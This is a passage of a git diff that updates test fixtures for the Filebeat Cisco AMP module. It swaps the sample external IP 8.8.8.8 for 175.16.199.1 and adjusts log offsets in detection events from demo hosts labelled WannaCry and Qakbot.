Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json index 528747f4ef22..33812fe19872 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json @@ -3,7 +3,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -46,7 +46,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -58,7 +58,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -92,7 +92,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 1193, + "log.offset": 1198, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -101,7 +101,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -113,7 +113,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -147,7 +147,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 2379, + "log.offset": 2389, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -156,7 +156,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -168,7 +168,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -202,7 +202,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 3572, + "log.offset": 3587, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -211,7 +211,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -223,7 +223,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -257,7 +257,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 4765, + "log.offset": 4785, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -266,7 +266,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -278,7 +278,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -312,7 +312,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 5950, + "log.offset": 5975, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -321,7 +321,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -333,7 +333,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -371,7 +371,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 7136, + "log.offset": 7166, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -380,7 +380,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -396,7 +396,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -437,7 +437,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 8409, + "log.offset": 8444, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 1008, @@ -451,7 +451,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -467,7 +467,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -505,7 +505,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 9938, + "log.offset": 9978, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -514,7 +514,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -530,7 +530,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -568,7 +568,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 11210, + "log.offset": 11255, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -577,7 +577,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -593,7 +593,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -625,7 +625,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 12488, + "log.offset": 12538, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -634,7 +634,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -646,7 +646,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -678,7 +678,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 13608, + "log.offset": 13663, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -687,7 +687,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -699,7 +699,7 @@ "@timestamp": "2021-01-14T14:41:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -731,7 +731,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 14728, + "log.offset": 14788, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -740,7 +740,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -752,7 +752,7 @@ "@timestamp": "2021-01-14T14:41:04.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -790,7 +790,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 15848, + "log.offset": 15913, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -799,7 +799,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -815,7 +815,7 @@ "@timestamp": "2021-01-14T14:41:04.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -856,7 +856,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 17121, + "log.offset": 17191, "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", @@ -872,7 +872,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -888,7 +888,7 @@ "@timestamp": "2021-01-14T14:41:04.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -929,7 +929,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 18745, + "log.offset": 18820, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 4772, @@ -943,7 +943,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -959,7 +959,7 @@ "@timestamp": "2021-01-14T14:41:04.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -998,7 +998,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 20287, + "log.offset": 20367, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -1012,7 +1012,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1028,7 +1028,7 @@ "@timestamp": "2021-01-14T14:41:03.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1069,7 +1069,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 21793, + "log.offset": 21878, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -1085,7 +1085,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1101,7 +1101,7 @@ "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1135,7 +1135,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 23391, + "log.offset": 23481, "related.hash": [ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], @@ -1144,7 +1144,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1156,7 +1156,7 @@ "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1190,7 +1190,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 24592, + "log.offset": 24687, "related.hash": [ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], @@ -1199,7 +1199,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1211,7 +1211,7 @@ "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1243,7 +1243,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 25793, + "log.offset": 25893, "related.hash": [ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], @@ -1252,7 +1252,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1264,7 +1264,7 @@ "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1302,7 +1302,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 26906, + "log.offset": 27011, "related.hash": [ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], @@ -1311,7 +1311,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1323,7 +1323,7 @@ "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1361,7 +1361,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 28140, + "log.offset": 28250, "related.hash": [ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], 
@@ -1370,7 +1370,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1382,7 +1382,7 @@ "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1422,7 +1422,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 29393, + "log.offset": 29508, "related.hash": [ "6894b3834bd541fa85df79e44568acac", "8cf0ca99a8f5019d8583133b9a9379299c45470c", @@ -1433,7 +1433,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1447,7 +1447,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1482,7 +1482,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 30752, + "log.offset": 30872, "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4", "related.hash": [ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" @@ -1492,7 +1492,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1504,7 +1504,7 @@ "@timestamp": "2021-01-14T13:46:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1536,7 +1536,7 @@ "host.hostname": "Demo_Low_Prev_Retro", "host.name": "Demo_Low_Prev_Retro", "input.type": "log", - "log.offset": 32509, + "log.offset": 32634, "related.hash": [ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], @@ -1545,7 +1545,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1557,7 +1557,7 @@ "@timestamp": "2021-01-14T13:46:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1597,7 +1597,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 33628, + "log.offset": 33758, "related.hash": [ "48a0bf05b9706a00d2a0ff6260412f11", "5058b16a86beee96927371210b9a9f682976a50a", @@ -1608,7 +1608,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1620,7 +1620,7 @@ "@timestamp": "2021-01-14T13:45:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1658,7 +1658,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 34974, + "log.offset": 35109, "related.hash": [ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], @@ -1667,7 +1667,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1679,7 +1679,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1713,7 +1713,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 36260, + "log.offset": 36400, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -1722,7 +1722,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1734,7 +1734,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1774,7 +1774,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 37453, + "log.offset": 37598, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "db349b97c37d22f5ea1d1841e3c89eb4", @@ -1785,7 +1785,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1801,7 +1801,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1840,7 +1840,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 38805, + "log.offset": 38955, "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", @@ -1854,7 +1854,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1870,7 +1870,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1908,7 +1908,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 40328, + "log.offset": 40483, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "db349b97c37d22f5ea1d1841e3c89eb4", @@ -1919,7 +1919,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1935,7 +1935,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1976,7 +1976,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 41673, + "log.offset": 41833, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": 